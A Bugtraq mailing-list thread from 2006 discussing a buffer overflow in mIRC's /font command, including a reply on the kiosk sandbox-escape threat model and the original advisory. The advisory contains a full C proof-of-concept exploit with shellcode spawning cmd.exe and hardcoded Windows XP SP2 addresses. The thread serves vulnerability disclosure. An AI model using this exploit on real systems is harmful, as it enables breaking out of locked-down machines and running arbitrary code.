RE: Buffer Overflow /Font on mIRC Jan 26 2006 11:36PM
Krpata, Tyler (tkrpata bjs com) (1 replies)
Re: Buffer Overflow /Font on mIRC Feb 01 2006 10:20PM
D.C. van Moolenbroek (dc van moolenbroek chello nl)
As quite some confusion has arisen as to how exactly this and the previous
finding [1] are security vulnerabilities, allow me to explain the issue in a
little more detail. The main point is that these are attacks of local users
against a locked-down (kiosk) system where the users can only run mIRC and
no other programs.

In order for these vulnerabilities to have any significance, the following
requirements would have to be met for an attacker on a system, at a minimum:

* The attacker is able to run mIRC, or it has been started for him already;
* The built-in /run, /dll and /com commands are password-locked in the mIRC
options;
* The mIRC directory, and mIRC's root (current) directory, are read-only;
* The attacker is _not_ able to start arbitrary programs on his user
account.

The result of using this exploit is then:

* The attacker is able to start arbitrary programs on his user account.

I.e. if you restrict a local user's abilities, and then set up and consider
mIRC to be a sandboxed environment for him, the local user can break out of
that sandboxed environment using this exploit. As indicated by the poster in
his first mail, environments at risk from this would typically be
cybercafes, where clients are only able to run (e.g.) a locked-down browser
and mIRC, and nothing else. The 'victim' of the exploitation would then be
the owner of the cybercafe.

Although the reported bugs can indeed be called security vulnerabilities in
such environments, it's somewhat of a stretch, given that mIRC doesn't
actually claim to be a complete sandbox, and already allows the user to e.g.
create/overwrite any writable file and make arbitrary socket connections
anyway. And fortunately, only a relatively small number of people are
affected by this vulnerability at all - certainly not any end-user. Either
way, these are bugs, and should of course be fixed.

Note that as the targeted environment obviously doesn't allow the user to
run a compiled exploit, actual exploitation would require that the shellcode
be constructed in mIRC's scripting language. It's rather easy to do that,
though.

Kind regards,
David van Moolenbroek

[1] http://www.securityfocus.com/archive/1/420000

----- Original Message -----
From: "Krpata, Tyler" <tkrpata (at) bjs (dot) com [email concealed]>
To: "Crowdat Kurobudetsu" <crowdat (at) gmail (dot) com [email concealed]>; <bugtraq (at) securityfocus (dot) com [email concealed]>
Sent: Friday, January 27, 2006 12:36 AM
Subject: RE: Buffer Overflow /Font on mIRC

I'm not following your English...are you saying you believe that this IS
or is NOT an exploitable bug?

-----Original Message-----
From: Crowdat Kurobudetsu [mailto:crowdat (at) gmail (dot) com [email concealed]]
Sent: Tuesday, January 24, 2006 6:24 AM
To: bugtraq (at) securityfocus (dot) com [email concealed]
Subject: Buffer Overflow /Font on mIRC

- 1 - Introduction

Written by Khaled Mardam-Bey, mIRC is a friendly IRC client that is well
equipped with options and tools.

- 2 - Vulnerability description

This bug was discovered by a friend (Racy) , with the command exposed by
Racy only hung mIRC, but after debugging and

testing, I discover that allow code execution.
Racy use this command /font -z $readini(c:\a\a.ini,aaaaaaa ,aaaa)
$readini(c:\a\a.ini,aaaaaaa ,aaaa) , in both cases return

null and crash, if the first parameter it's null and the second a long
string can overwrite the EIP and execute code, with

user privileges, DON'T ELEVATE PRIVILEGES.

- 3 - How to exploit it

This PoC open a cmd.exe,also it's possible execute any other code.

----------- CUT HERE ----------------------
/*
mircfontexploitXPSP2.c

This PoC it's for XP SP2 English
Special thanks to Racy from irc-hispano
*/

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

int main () {
HWND lHandle;
char command[512]= "/font -z $null";
char strClass[30];
char buffer[128]=
"\x20\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

char shellcode[999]=
"\x55"
"\x8B\xEC"
"\x33\xFF"
"\x57"
"\x83\xEC\x04"
"\xC6\x45\xF8\x63"
"\xC6\x45\xF9\x6D"
"\xC6\x45\xFA\x64"
"\xC6\x45\xFB\x2E"
"\xC6\x45\xFC\x65"
"\xC6\x45\xFD\x78"
"\xC6\x45\xFE\x65"
"\x8D\x45\xF8"
"\x50"
"\xBB\xc7\x93\xc2\x77"
"\xFF\xD3";

//Shellcode system("cmd.exe"), system in \xc7\x93\xc2\x77 0x77c293c7
(WinXP Sp2 English)

char saltaoffset[]="\xD6\xD1\xE5\x77"; // jmp esp 0x77E5D1D6
(advapi32.dll)

SetForegroundWindow(lHandle);
lHandle = FindWindowEx(FindWindowEx(FindWindowEx(FindWindow("mIRC",
NULL), 0, "MDIClient", 0),0, "mIRC_Status", 0), 0, "Edit

", 0);

if (!lHandle) { printf("Can't find mIRC\n"); return 0; }

strcat(buffer,saltaoffset);
strcat(buffer,shellcode);
strcat(command,buffer);
printf("mIRC Font Command Exploit: %s\n", command);

SendMessage(lHandle, WM_SETTEXT,0,(LPARAM)command); SendMessage
(lHandle, WM_IME_KEYDOWN, VK_RETURN, 0); }

----------- CUT HERE ----------------------

- 4 - Solution

Khaled contacted with me about the latest advisory, he says don't have
any bug, any vulnerability.
This is the solution of Khaled:
"as far as I can tell, this is neither an exploit nor a vulnerability.
The above report describes a local bug in mIRC. The

author of the report indicates that any malicious software on your
computer can modify your mIRC settings to cause mIRC to

crash. But if you have malicious software on your computer, you've
already compromised your security..."

I post a response in the messageboard in mIRC forum, telling that a
exploit isn't a malicious software alone, isn't a trojan

or virus, and if a application it's secure, it's impossibly to execute
any code, the user don't compromise the machine if

download a exploit, the machine it's compromised if the program it's
vulnerable to the exploit, but Khaled delete it and

close the thread.

More info:
http://trout.snt.utwente.nl/ubbthreads/showflat.php?Cat=0&Number=146129&

an=0&page=0#146129

- 5 - Credits

URL Vendor: www.mirc.com
Author: Jordi Corrales ( crowdat[at]gmail.com )
Date: 24/01/2006

Racy post on messageboard:
http://trout.snt.utwente.nl/ubbthreads/showflat.php?Cat=0&Board=bugrepor

ts&Number=118751
Spanish Advisory and Compiled Spanish Exploit:
http://cyruxnet.org/archivo.php?20060121.00

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus